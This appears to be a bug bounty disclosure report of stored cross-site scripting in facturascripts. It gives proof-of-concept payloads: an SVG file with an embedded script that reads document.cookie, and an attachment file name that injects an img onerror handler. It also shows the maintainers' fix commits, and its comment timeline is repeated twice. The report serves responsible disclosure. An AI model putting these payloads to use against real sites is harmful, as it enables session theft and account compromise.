/

Multiple Store XSS via upload svg file and the file name of attachment in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022

Description

Hi There, facturascripts is vulnerable to store XSS by upload svg file, and the filename

Step to produce with svg file

Login as admin or any account has role Admin->Library, access Admin -> library -> New and upload file svg with content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

save this. XSS will be trigger when you download it.

Step to produce with file name payload:

just upload file with the file name: %22><img src=x onerror=alert(document.cookie).xlsx -> xss will be trigger

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

Minh modified the report

a year ago

Minh modified the report

a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

Carlos Garcia validated this vulnerability a year ago

Minh has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carlos Garcia marked this as fixed in 2022.06 with commit 1d1edb a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

commented a year ago

Researcher

@neorazorx seem the xss on file name has not been fixed. https://github.com/NeoRazorX/facturascripts/blob/6add3d0d9c6d6d4f7dbeea1c838cb900dc9af97d/Core/Controller/ListAttachedFile.php#L52

commented a year ago

Maintainer

You're right. I have corrected it in this commit https://github.com/NeoRazorX/facturascripts/commit/a5e64bb5f29367e072dfc984e775731c6b3dd8f4

Thank you so much for everything

commented a year ago

Researcher

@admin, could you please assign cve for this report?

commented a year ago

Maintainer

That option is hidden to me

commented a year ago

Admin

Sorted 👍

to join this conversation

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

Minh modified the report

a year ago

Minh modified the report

a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

Carlos Garcia validated this vulnerability a year ago

Minh has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carlos Garcia marked this as fixed in 2022.06 with commit 1d1edb a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

commented a year ago

Researcher

@neorazorx seem the xss on file name has not been fixed. https://github.com/NeoRazorX/facturascripts/blob/6add3d0d9c6d6d4f7dbeea1c838cb900dc9af97d/Core/Controller/ListAttachedFile.php#L52

commented a year ago

Maintainer

You're right. I have corrected it in this commit https://github.com/NeoRazorX/facturascripts/commit/a5e64bb5f29367e072dfc984e775731c6b3dd8f4

Thank you so much for everything

commented a year ago

Researcher

@admin, could you please assign cve for this report?

commented a year ago

Maintainer

That option is hidden to me

commented a year ago

Admin

Sorted 👍

to join this conversation